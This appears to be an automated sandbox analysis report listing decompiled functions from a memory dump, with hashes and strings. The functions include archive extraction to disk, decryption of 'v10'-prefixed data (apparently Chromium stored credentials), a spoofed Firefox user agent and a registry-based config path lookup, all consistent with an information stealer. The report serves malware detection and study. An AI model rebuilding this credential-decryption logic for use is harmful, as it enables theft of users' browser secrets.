			E004095C0(void* __ebx, void* __edx, void* __edi, signed int __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v528;
				struct _FILETIME _v544;
				struct _FILETIME _v552;
				struct _FILETIME _v560;
				unsigned int _v564;
				char _v828;
				signed int _v832;
				char _v833;
				long _v840;
				signed int _t67;
				intOrPtr* _t69;
				signed int _t70;
				signed int _t71;
				signed char _t74;
				signed int _t75;
				signed int _t77;
				signed int _t87;
				signed int _t92;
				void* _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t101;
				intOrPtr _t109;
				intOrPtr* _t110;
				void* _t111;
				void* _t112;
				intOrPtr* _t115;
				signed int _t124;
				signed int* _t143;
				void* _t144;
				signed int _t146;
				intOrPtr* _t147;
				long _t148;
				signed int _t149;
				void* _t150;
				signed int _t151;
				signed int _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t67 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t67 ^ _t152;
				_t69 = _a4;
				_t113 = _a12;
				_v832 = _a12;
				if(_t69 != 0) {
					__eflags =  *_t69 - 1;
					if( *_t69 == 1) {
						_push(__ebx);
						_push(__esi);
						_push(__edi);
						_t143 =  *(_t69 + 4);
						_t146 = __esi | 0xffffffff;
						__eflags = _t143[1] - _t146;
						if(_t143[1] != _t146) {
							_t136 =  *_t143;
							E00406D80(_t113,  *_t143);
							_t153 = _t153 + 4;
						}
						_t70 =  *_t143;
						_t109 = _a8;
						_t143[1] = _t146;
						__eflags = _t109 -  *((intOrPtr*)(_t70 + 4));
						if(_t109 <  *((intOrPtr*)(_t70 + 4))) {
							__eflags = _t109 -  *((intOrPtr*)(_t70 + 0x10));
							if(_t109 <  *((intOrPtr*)(_t70 + 0x10))) {
								E004069D0(_t70);
								_t153 = _t153 + 4;
							}
							_t71 =  *_t143;
							__eflags =  *((intOrPtr*)(_t71 + 0x10)) - _t109;
							if( *((intOrPtr*)(_t71 + 0x10)) < _t109) {
								do {
									_t151 =  *_t143;
									__eflags = _t151;
									if(_t151 != 0) {
										__eflags =  *(_t151 + 0x18);
										if( *(_t151 + 0x18) != 0) {
											_t97 =  *((intOrPtr*)(_t151 + 0x10)) + 1;
											__eflags = _t97 -  *((intOrPtr*)(_t151 + 4));
											if(_t97 !=  *((intOrPtr*)(_t151 + 4))) {
												 *((intOrPtr*)(_t151 + 0x14)) =  *((intOrPtr*)(_t151 + 0x14)) +  *((intOrPtr*)(_t151 + 0x50)) +  *((intOrPtr*)(_t151 + 0x4c)) +  *((intOrPtr*)(_t151 + 0x48)) + 0x2e;
												 *((intOrPtr*)(_t151 + 0x10)) = _t97;
												_t99 = E00406650(_t151, _t151 + 0x28, _t151 + 0x78, 0, 0, 0, 0, 0, 0);
												_t153 = _t153 + 0x24;
												asm("sbb eax, eax");
												_t101 =  ~_t99 + 1;
												__eflags = _t101;
												 *(_t151 + 0x18) = _t101;
											}
										}
									}
									_t124 =  *_t143;
									__eflags =  *((intOrPtr*)(_t124 + 0x10)) - _t109;
								} while ( *((intOrPtr*)(_t124 + 0x10)) < _t109);
							}
							E00406E10(_t143,  &_v828, _t109,  &_v828);
							_t74 = _v564 >> 4;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								_t147 = _v832;
								_t110 = _t147;
								_t75 =  *_t110;
								_v528 = 0;
								_t115 = _t110;
								__eflags = _t75;
								while(_t75 != 0) {
									__eflags = _t75 - 0x2f;
									if(_t75 == 0x2f) {
										L23:
										_t147 = _t115 + 1;
									} else {
										__eflags = _t75 - 0x5c;
										if(_t75 == 0x5c) {
											goto L23;
										}
									}
									_t75 =  *((intOrPtr*)(_t115 + 1));
									_t115 = _t115 + 1;
									__eflags = _t75;
								}
								E0042CB4B( &_v268, _t110, 0x104);
								_t154 = _t153 + 0xc;
								__eflags = _t147 - _t110;
								if(_t147 != _t110) {
									 *((char*)(_t152 + _t147 - _t110 - 0x108)) = 0;
									_t77 = _v268;
									__eflags = _t77 - 0x2f;
									if(_t77 == 0x2f) {
										L34:
										wsprintfA( &_v528, "%s%s",  &_v268, _t147);
										_t155 = _t154 + 0x10;
										goto L28;
									} else {
										__eflags = _t77 - 0x5c;
										if(_t77 == 0x5c) {
											goto L34;
										} else {
											__eflags = _t77;
											if(_t77 == 0) {
												goto L27;
											} else {
												__eflags = _v267 - 0x3a;
												if(_v267 != 0x3a) {
													goto L27;
												} else {
													goto L34;
												}
											}
										}
									}
									goto L51;
								} else {
									_v268 = 0;
									L27:
									wsprintfA( &_v528, "%s%s%s",  &(_t143[0x50]),  &_v268, _t147);
									_t155 = _t154 + 0x14;
								}
								L28:
								_t136 = _v564;
								_t111 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0);
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									E00408BB0(_t143[0x4e],  *_t143, _t143[0x4e]);
									_t156 = _t155 + 8;
									__eflags = _t143[0x4f];
									if(__eflags == 0) {
										_push(0x4000);
										_t93 = E0042976C(_t143, _t147, __eflags);
										_t156 = _t156 + 4;
										_t143[0x4f] = _t93;
									}
									_v832 = 0;
									while(1) {
										_t119 = _t143[0x4f];
										_t148 = E00408D30( *_t143, _t143[0x4f], 0x4000,  &_v833);
										_t156 = _t156 + 0x10;
										__eflags = _t148 - 0xffffff96;
										if(_t148 == 0xffffff96) {
											break;
										}
										__eflags = _t148;
										if(__eflags < 0) {
											L44:
											_v832 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L42:
												__eflags = _v833;
												if(_v833 == 0) {
													__eflags = _t148;
													if(_t148 != 0) {
														continue;
													} else {
														goto L44;
													}
												}
											} else {
												_t119 = _t143[0x4f];
												_t92 = WriteFile(_t111, _t143[0x4f], _t148,  &_v840, 0);
												__eflags = _t92;
												if(_t92 == 0) {
													_v832 = 0x400;
												} else {
													goto L42;
												}
											}
										}
										L45:
										_t136 =  *_t143;
										E00406D80(_t119,  *_t143);
										_t149 = _v832;
										__eflags = _t149;
										if(_t149 == 0) {
											_t136 =  &_v552;
											SetFileTime(_t111,  &_v552,  &_v560,  &_v544);
										}
										CloseHandle(_t111);
										_t87 = _t149;
										goto L48;
									}
									_v832 = 0x1000;
									goto L45;
								} else {
									_t87 = 0x200;
								}
							} else {
								_t87 = 0;
							}
						} else {
							_t87 = 0x10000;
						}
						L48:
						_pop(_t144);
						_pop(_t150);
						__eflags = _v8 ^ _t152;
						_pop(_t112);
						 *0x453c88 = _t87;
						return E0042A36A(_t87, _t112, _v8 ^ _t152, _t136, _t144, _t150);
					} else {
						 *0x453c88 = 0x80000;
						__eflags = _v8 ^ _t152;
						return E0042A36A(0x80000, __ebx, _v8 ^ _t152, __edx, __edi, __esi);
					}
				} else {
					 *0x453c88 = 0x10000;
					return E0042A36A(0x10000, __ebx, _v8 ^ _t152, __edx, __edi, __esi);
				}
				L51:
			}

0x004095c9
0x004095d0
0x004095d3
0x004095d6
0x004095d9
0x004095e1
0x004095fb
0x004095fe
0x00409618
0x00409619
0x0040961a
0x0040961b
0x0040961e
0x00409621
0x00409624
0x00409626
0x00409629
0x0040962e
0x0040962e
0x00409631
0x00409633
0x00409636
0x00409639
0x0040963c
0x00409648
0x0040964b
0x0040964e
0x00409653
0x00409653
0x00409656
0x00409658
0x0040965b
0x00409660
0x00409660
0x00409662
0x00409664
0x00409666
0x0040966a
0x0040966f
0x00409670
0x00409673
0x0040968c
0x00409694
0x0040969d
0x004096a2
0x004096a7
0x004096a9
0x004096a9
0x004096aa
0x004096aa
0x00409673
0x0040966a
0x004096ad
0x004096af
0x004096af
0x00409660
0x004096be
0x004096c9
0x004096cc
0x004096ce
0x004096d7
0x004096dd
0x004096df
0x004096e1
0x004096e8
0x004096ea
0x004096ec
0x004096f0
0x004096f2
0x004096f8
0x004096f8
0x004096f4
0x004096f4
0x004096f6
0x00000000
0x00000000
0x004096f6
0x004096fb
0x004096fe
0x004096ff
0x004096ff
0x00409710
0x00409715
0x00409718
0x0040971a
0x0040977d
0x00409785
0x0040978b
0x0040978d
0x004097a0
0x004097b4
0x004097ba
0x00000000
0x0040978f
0x0040978f
0x00409791
0x00000000
0x00409793
0x00409793
0x00409795
0x00000000
0x00409797
0x00409797
0x0040979e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040979e
0x00409795
0x00409791
0x00000000
0x0040971c
0x0040971c
0x00409723
0x0040973e
0x00409744
0x00409744
0x00409747
0x00409747
0x00409768
0x0040976a
0x0040976d
0x004097c9
0x004097ce
0x004097d1
0x004097d8
0x004097da
0x004097df
0x004097e4
0x004097e7
0x004097e7
0x004097ed
0x00409800
0x00409800
0x0040981b
0x0040981d
0x00409820
0x00409823
0x00000000
0x00000000
0x00409829
0x0040982b
0x00409858
0x00409858
0x0040982d
0x0040982d
0x0040984b
0x0040984b
0x00409852
0x00409854
0x00409856
0x00000000
0x00000000
0x00000000
0x00000000
0x00409856
0x0040982f
0x0040982f
0x00409841
0x00409847
0x00409849
0x004098be
0x00000000
0x00000000
0x00000000
0x00409849
0x0040982d
0x00409862
0x00409862
0x00409865
0x0040986a
0x00409873
0x00409875
0x00409885
0x0040988d
0x0040988d
0x00409894
0x0040989a
0x00000000
0x0040989a
0x004098b2
0x00000000
0x0040976f
0x0040976f
0x0040976f
0x004096d0
0x004096d0
0x004096d0
0x0040963e
0x0040963e
0x0040963e
0x0040989c
0x0040989f
0x004098a0
0x004098a1
0x004098a3
0x004098a4
0x004098b1
0x00409600
0x00409605
0x0040960d
0x00409617
0x00409617
0x004095e3
0x004095e8
0x004095fa
0x004095fa
0x00000000

Strings

:, xrefs: 00409797
%s%s%s, xrefs: 00409738
%s%s, xrefs: 004097AE

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID: %s%s$%s%s%s$:
API String ID: 0-3034790606
Opcode ID: a85516865e75b2ca0b96419d570cb5896f70b8e63c2148fb0129e951dedebd9e
Instruction ID: a76c429ef84ff5b4319bcbdb325173e39dd23ca05d3bd767c0eea20056089c01
Opcode Fuzzy Hash: a85516865e75b2ca0b96419d570cb5896f70b8e63c2148fb0129e951dedebd9e
Instruction Fuzzy Hash: 8E9103719002149FDB20DF24CC84BAAB3B8AB45304F1445BEE85A773C2D779AE85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 129
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041A2B0(char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v48;
				long _v52;
				intOrPtr _v56;
				intOrPtr _v92;
				long _v96;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				int _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t40;
				void* _t48;
				long _t54;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t80;
				void* _t81;
				void* _t82;
				long _t83;
				void* _t84;
				char* _t86;
				void* _t87;
				signed int _t88;
				void* _t89;
				void* _t90;

				_push(0xffffffff);
				_push(E0043EF78);
				_push( *[fs:0x0]);
				_t90 = _t89 - 0x68;
				_t39 =  *0x451f00; // 0xc21d6f0a
				_t40 = _t39 ^ _t88;
				_v20 = _t40;
				_push(_t40);
				 *[fs:0x0] =  &_v16;
				_t80 = _a12;
				_t86 = _a4;
				_t63 = _a8;
				_v56 = _a20;
				_v52 = 0;
				if(_t80 < 3) {
					L9:
					_t81 = E00415180(__eflags, _t63, _t80);
					 *((intOrPtr*)(_t86 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t86 + 0x10)) = 0;
					 *_t86 = 0;
					_push(E0042BC70(_t81));
					_push(_t81);
					goto L10;
				} else {
					_t48 = E0042A379(_t63, "v10", 3);
					_t90 = _t90 + 0xc;
					if(_t48 != 0) {
						goto L9;
					} else {
						if(_a16 == _t48 || _v56 == _t48) {
							 *((intOrPtr*)(_t86 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t86 + 0x10)) = 0;
							 *_t86 = 0;
							_push(E0042BC70("NULL"));
							_push("NULL");
							L10:
							E00404BC0(_t86);
						} else {
							E0042A2F0( &_v120, _t48, 0x40);
							_t65 = _t63 + 3;
							_t78 = _t80 + _t65 - 0x13;
							_t83 = _t80 + 0xffffffe1;
							_v120 = 0x40;
							_v116 = 1;
							_v112 = _t65;
							_v108 = 0xc;
							_v96 = _t80 + _t65 - 0x13;
							_v92 = 0x10;
							_v52 = _t83;
							_t84 = LocalAlloc(0x40, _t83);
							if(_t84 == 0) {
								L7:
								E00404CC0(_t86, "NULL");
							} else {
								_push(0);
								_push( &_v52);
								_t54 = _v52;
								_push(_t54);
								_push(_t84);
								_push(0);
								_push(0);
								_push( &_v120);
								_push(_t54);
								_push(_v108 + _v112);
								_push(_v56);
								if( *0x4648a8() < 0) {
									goto L7;
								} else {
									_t78 = _v52;
									E004194A0( &_v48, _t84, _v52);
									_v8 = 0;
									E00404D80(_t86,  &_v48);
									E0040A450( &_v48);
								}
							}
						}
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t82);
				_pop(_t87);
				_pop(_t64);
				return E0042A36A(_t86, _t64, _v20 ^ _t88, _t78, _t82, _t87);
			}

0x0041a2b3
0x0041a2b5
0x0041a2c0
0x0041a2c1
0x0041a2c4
0x0041a2c9
0x0041a2cb
0x0041a2d1
0x0041a2d5
0x0041a2db
0x0041a2e1
0x0041a2e4
0x0041a2e7
0x0041a2ea
0x0041a2f4
0x0041a3f7
0x0041a3fe
0x0041a400
0x0041a407
0x0041a40f
0x0041a41a
0x0041a41b
0x00000000
0x0041a2fa
0x0041a302
0x0041a307
0x0041a30c
0x00000000
0x0041a312
0x0041a315
0x0041a3d1
0x0041a3d8
0x0041a3e4
0x0041a3ef
0x0041a3f0
0x0041a41c
0x0041a41e
0x0041a324
0x0041a32b
0x0041a330
0x0041a333
0x0041a33a
0x0041a340
0x0041a347
0x0041a34e
0x0041a351
0x0041a358
0x0041a35b
0x0041a362
0x0041a36b
0x0041a36f
0x0041a3c3
0x0041a3ca
0x0041a371
0x0041a371
0x0041a376
0x0041a377
0x0041a37a
0x0041a37b
0x0041a37c
0x0041a37e
0x0041a383
0x0041a387
0x0041a38e
0x0041a38f
0x0041a398
0x00000000
0x0041a39a
0x0041a39a
0x0041a3a2
0x0041a3ad
0x0041a3b4
0x0041a3bc
0x0041a3bc
0x0041a398
0x0041a36f
0x0041a315
0x0041a30c
0x0041a428
0x0041a430
0x0041a431
0x0041a432
0x0041a440

APIs

_memcmp.LIBCMT ref: 0041A302
_memset.LIBCMT ref: 0041A32B
LocalAlloc.KERNEL32(00000040,?), ref: 0041A365
_strlen.LIBCMT ref: 0041A3E7
_strlen.LIBCMT ref: 0041A412

Strings

v10, xrefs: 0041A2FC
@, xrefs: 0041A340
NULL, xrefs: 0041A3C3, 0041A3DF, 0041A3F0

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$AllocLocal_memcmp_memset
String ID: @$NULL$v10
API String ID: 14285340-2514931324
Opcode ID: d1ecb1cc27e871fdf68090d9725cc693fe603836cf62a9c52774bfc8ada960fd
Instruction ID: feb5040922f806e7246019ab5ae18c0aae542a7d5a23eba45e3acbbbf499b467
Opcode Fuzzy Hash: d1ecb1cc27e871fdf68090d9725cc693fe603836cf62a9c52774bfc8ada960fd
Instruction Fuzzy Hash: 2E4183B1A00308ABDB10DF55EC45FEEB7B8EB44714F10012EF915A7281DBB89954CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00420FA0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00420FA0(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				void* __edi;
				void* __esi;
				signed int _t26;
				intOrPtr* _t29;
				char* _t32;
				char* _t35;
				char* _t38;
				char _t42;
				intOrPtr _t45;
				char* _t49;
				char* _t50;
				char* _t51;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				char* _t62;
				void* _t64;
				void* _t65;
				char _t66;
				char _t67;
				intOrPtr* _t68;
				signed int _t70;
				void* _t71;
				void* _t76;

				_push(0xffffffff);
				_push(E0043F6B0);
				_push( *[fs:0x0]);
				_push(_t64);
				_push(_t59);
				_t26 =  *0x451f00; // 0xc21d6f0a
				_push(_t26 ^ _t70);
				 *[fs:0x0] =  &_v16;
				_v20 = _t71 - 0xc;
				_t45 = __ecx;
				_v28 = __ecx;
				_t29 = E0042E101(_t59, _t64, _t76);
				_v24 = _t29;
				 *((intOrPtr*)(_t45 + 8)) = 0;
				 *((intOrPtr*)(_t45 + 0x10)) = 0;
				 *((intOrPtr*)(_t45 + 0x14)) = 0;
				_v8 = 0;
				_t60 = 0x443c1c;
				_t77 = _a8;
				if(_a8 == 0) {
					_t60 =  *((intOrPtr*)(_t29 + 8));
				}
				E0042A17E();
				_t11 = E0042BC70(_t60) + 1; // 0x1
				_t65 = _t11;
				_push(_t65);
				_t32 = E0042976C(_t60, _t65, _t77);
				_t49 = _t32;
				while(_t65 != 0) {
					 *_t49 =  *_t60;
					_t65 = _t65 - 1;
					_t49 = _t49 + 1;
					_t60 = _t60 + 1;
				}
				 *((intOrPtr*)(_t45 + 8)) = _t32;
				E0042A17E();
				_t61 = "false";
				_t13 = E0042BC70(_t61) + 1; // 0x1
				_t66 = _t13;
				_push(_t66);
				_t35 = E0042976C(_t61, _t66, __eflags);
				_t50 = _t35;
				while(1) {
					__eflags = _t66;
					if(_t66 == 0) {
						break;
					}
					 *_t50 =  *_t61;
					_t66 = _t66 - 1;
					_t50 = _t50 + 1;
					_t61 = _t61 + 1;
				}
				 *((intOrPtr*)(_t45 + 0x10)) = _t35;
				E0042A17E();
				_t62 = "true";
				_t15 = E0042BC70(_t62) + 1; // 0x1
				_t67 = _t15;
				_push(_t67);
				_t38 = E0042976C(_t62, _t67, __eflags);
				_t51 = _t38;
				while(1) {
					__eflags = _t67;
					if(_t67 == 0) {
						break;
					}
					 *_t51 =  *_t62;
					_t67 = _t67 - 1;
					_t51 = _t51 + 1;
					_t62 =  &(_t62[1]);
				}
				 *((intOrPtr*)(_t45 + 0x14)) = _t38;
				E0042A17E();
				_t68 = _v24;
				 *((char*)(_t45 + 0xc)) =  *((intOrPtr*)( *_t68));
				E0042A17E();
				__eflags = _a8;
				_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 4))));
				 *((char*)(_t45 + 0xd)) = _t42;
				if(_a8 != 0) {
					E0042A17E();
					 *((char*)(_t45 + 0xc)) = 0x2e;
					_t42 = E0042A17E();
					 *((char*)(_t45 + 0xd)) = 0x2c;
				}
				 *[fs:0x0] = _v16;
				return _t42;
			}

0x00420fa3
0x00420fa5
0x00420fb0
0x00420fb5
0x00420fb6
0x00420fb7
0x00420fbe
0x00420fc2
0x00420fc8
0x00420fcb
0x00420fcd
0x00420fd0
0x00420fd7
0x00420fda
0x00420fdd
0x00420fe0
0x00420fe3
0x00420fe6
0x00420feb
0x00420fee
0x00420ff0
0x00420ff0
0x00420ff3
0x00420ffe
0x00420ffe
0x00421001
0x00421002
0x0042100a
0x00421010
0x00421016
0x00421018
0x00421019
0x0042101a
0x0042101a
0x0042101d
0x00421020
0x00421025
0x00421030
0x00421030
0x00421033
0x00421034
0x0042103c
0x00421040
0x00421040
0x00421042
0x00000000
0x00000000
0x00421046
0x00421048
0x00421049
0x0042104a
0x0042104a
0x0042104d
0x00421050
0x00421055
0x00421060
0x00421060
0x00421063
0x00421064
0x0042106c
0x00421070
0x00421070
0x00421072
0x00000000
0x00000000
0x00421076
0x00421078
0x00421079
0x0042107a
0x0042107a
0x0042107d
0x00421080
0x00421085
0x0042108c
0x0042108f
0x00421094
0x0042109b
0x0042109d
0x004210a0
0x004210a2
0x004210a7
0x004210ab
0x004210b0
0x004210b0
0x004210b7
0x004210c5

APIs

_localeconv.LIBCMT ref: 00420FD0

Part of subcall function 0042E101: __getptd.LIBCMT ref: 0042E101

_strlen.LIBCMT ref: 00420FF9
_strlen.LIBCMT ref: 0042102B
_strlen.LIBCMT ref: 0042105B

Strings

,, xrefs: 004210B0
., xrefs: 004210A7
false, xrefs: 00421025, 0042102A
true, xrefs: 00421055, 0042105A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$__getptd_localeconv
String ID: ,$.$false$true
API String ID: 1474113497-4283260876
Opcode ID: 6e28326dc5fc8a291f25365b3d0e82e297f8fab98f72773d49decc13931b140d
Instruction ID: 7bc41e15a75f53a60b2701761e442c090ec694254779d763c656bd4629247de6
Opcode Fuzzy Hash: 6e28326dc5fc8a291f25365b3d0e82e297f8fab98f72773d49decc13931b140d
Instruction Fuzzy Hash: 8C316E31E082A0CBCB019F25A84066A7FE4EF46354F5880AFE9445F313C73D8D158BEA

Uniqueness

Uniqueness Score: -1.00%

Function 00420220 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00420220(void* __edi, void* __eflags, char* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v48;
				char _v52;
				char _v56;
				char* _v60;
				void* __ebx;
				void* __esi;
				signed int _t26;
				signed int _t27;
				void* _t31;
				char* _t36;
				void* _t37;
				void* _t40;
				void* _t48;
				void* _t60;
				char* _t62;
				void* _t63;
				signed int _t64;
				void* _t65;
				void* _t68;
				void* _t69;

				_t60 = __edi;
				_push(0xffffffff);
				_push(E0043F689);
				_push( *[fs:0x0]);
				_t26 =  *0x451f00; // 0xc21d6f0a
				_t27 = _t26 ^ _t64;
				_v20 = _t27;
				_push(_t27);
				 *[fs:0x0] =  &_v16;
				_t62 = _a4;
				_v56 = 0;
				 *((intOrPtr*)(_t62 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t62 + 0x10)) = 0;
				_v8 = 0;
				_v60 = _t62;
				 *_t62 = 0;
				E00404BC0(_t62, 0x443c1c, E0042BC70(0x443c1c));
				_v8 = 0;
				_v56 = 1;
				_t31 = E0042BC70("Mozilla/5.0 (Windows NT 10.0; ");
				_t68 = _t65 - 0x2c + 8;
				E00404BC0(_t62, "Mozilla/5.0 (Windows NT 10.0; ", _t31);
				_push( &_v52);
				_v52 = 0;
				_push(GetCurrentProcess());
				if( *0x464880() == 0) {
					L2:
					_t36 = "x86";
				} else {
					_t36 = "x64";
					_t74 = _v52;
					if(_v52 == 0) {
						goto L2;
					}
				}
				_t37 = E0040D100(_t74,  &_v48, _t62, _t36);
				_t69 = _t68 + 0xc;
				_v8 = 1;
				E00404D00(_t62, _t37);
				_t75 = _v28 - 0x10;
				_v8 = 0;
				if(_v28 >= 0x10) {
					_t59 = _v48;
					_push(_v48);
					E0042A289();
					_t69 = _t69 + 4;
				}
				_t40 = E0040D100(_t75,  &_v48, _t62, " rv:107.0) Gecko / 20100101 Firefox / 107.0");
				_v8 = 2;
				E00404D00(_t62, _t40);
				if(_v28 >= 0x10) {
					_push(_v48);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t63);
				_pop(_t48);
				return E0042A36A(_t62, _t48, _v20 ^ _t64, _t59, _t60, _t63);
			}

0x00420220
0x00420223
0x00420225
0x00420230
0x00420234
0x00420239
0x0042023b
0x00420240
0x00420244
0x0042024a
0x0042024f
0x00420252
0x00420259
0x00420261
0x00420264
0x00420267
0x00420279
0x00420283
0x00420286
0x0042028d
0x00420292
0x0042029d
0x004202a5
0x004202a6
0x004202af
0x004202b8
0x004202c4
0x004202c4
0x004202ba
0x004202ba
0x004202bf
0x004202c2
0x00000000
0x00000000
0x004202c2
0x004202cf
0x004202d4
0x004202da
0x004202e1
0x004202e6
0x004202ea
0x004202ed
0x004202ef
0x004202f2
0x004202f3
0x004202f8
0x004202f8
0x00420305
0x00420310
0x00420317
0x00420320
0x00420325
0x00420326
0x0042032b
0x00420333
0x0042033b
0x0042033c
0x0042034a

APIs

_strlen.LIBCMT ref: 00420269
_strlen.LIBCMT ref: 0042028D
GetCurrentProcess.KERNEL32(00000002,Mozilla/5.0 (Windows NT 10.0; ,00000000), ref: 004202A9
IsWow64Process.KERNEL32(00000000), ref: 004202B0

Strings

x64, xrefs: 004202BA
rv:107.0) Gecko / 20100101 Firefox / 107.0, xrefs: 004202FB
Mozilla/5.0 (Windows NT 10.0; , xrefs: 0042027E, 00420296
x86, xrefs: 004202C4, 004202C9

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Process_strlen$CurrentWow64
String ID: rv:107.0) Gecko / 20100101 Firefox / 107.0$Mozilla/5.0 (Windows NT 10.0; $x64$x86
API String ID: 2590077329-3528451930
Opcode ID: 0330b3860bcaf7a736ad534f7fa34ae6b9c81bd93a482f94f29689cd3f4f37f8
Instruction ID: c430a3b879de0686b38dfc9576b1a378667a1eceb3e5e2507819d8d867345321
Opcode Fuzzy Hash: 0330b3860bcaf7a736ad534f7fa34ae6b9c81bd93a482f94f29689cd3f4f37f8
Instruction Fuzzy Hash: 6B31A8B1E01214EFDB00EFA5E845B9EB7B8EB09714F50413FF405A3241DB79990487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A0C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A0C0(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				char _v523;
				char _v524;
				void* _v528;
				int _v532;
				signed int _t21;
				intOrPtr _t31;
				intOrPtr _t36;
				void* _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				char* _t56;
				intOrPtr _t59;
				intOrPtr _t61;
				char* _t63;
				void* _t64;
				void* _t65;
				signed int _t66;

				_t65 = __esi;
				_t64 = __edi;
				_t45 = __ebx;
				_t21 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t21 ^ _t66;
				_v532 = 0xff;
				_v524 = 0;
				E0042A2F0( &_v523, 0, 0xfe);
				_t56 =  *0x4536fc; // 0x25c9728
				if(RegOpenKeyExA(0x80000001, _t56, 0, 0x20119,  &_v528) == 0) {
					_t63 =  *0x453a8c; // 0x25c9e98
					RegQueryValueExA(_v528, _t63, 0, 0,  &_v524,  &_v532);
				}
				RegCloseKey(_v528);
				E0042A2F0( &_v268, 0, 0x104);
				 *0x464860( &_v268,  &_v524);
				 *0x464860("\\config\\");
				_t31 =  *0x4533f0; // 0x25c8700
				E00409F60(_t45,  &_v524, _t31);
				_t59 =  *0x453684; // 0x25c9eb0
				E00409F60(_t45,  &_v268, _t59);
				_t50 =  *0x453394; // 0x25c9908
				E00409F60(_t45,  &_v268, _t50);
				_t36 =  *0x453b48; // 0x25c6c78
				E00409F60(_t45,  &_v268, _t36);
				_t61 =  *0x4536e8; // 0x25c97a8
				E00409F60(_t45,  &_v268, _t61);
				_t52 =  *0x4538ec; // 0x25c9f10
				return E0042A36A(E00409F60(_t45,  &_v268, _t52), _t45, _v8 ^ _t66,  &_v268, _t64, _t65,  &_v268);
			}

0x0040a0c0
0x0040a0c0
0x0040a0c0
0x0040a0c9
0x0040a0d0
0x0040a0e1
0x0040a0eb
0x0040a0f2
0x0040a0f7
0x0040a11c
0x0040a11e
0x0040a13e
0x0040a13e
0x0040a14b
0x0040a15f
0x0040a175
0x0040a187
0x0040a18d
0x0040a19a
0x0040a19f
0x0040a1ad
0x0040a1b2
0x0040a1c0
0x0040a1c5
0x0040a1d2
0x0040a1d7
0x0040a1e5
0x0040a1ea
0x0040a20d

APIs

_memset.LIBCMT ref: 0040A0F2
RegOpenKeyExA.ADVAPI32(80000001,025C9728,00000000,00020119,?), ref: 0040A114
RegQueryValueExA.ADVAPI32(?,025C9E98,00000000,00000000,00000000,000000FF), ref: 0040A13E
RegCloseKey.ADVAPI32(?), ref: 0040A14B
_memset.LIBCMT ref: 0040A15F
lstrcat.KERNEL32(?,00000000), ref: 0040A175
lstrcat.KERNEL32(?,\config\), ref: 0040A187

Strings

\config\, xrefs: 0040A17B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
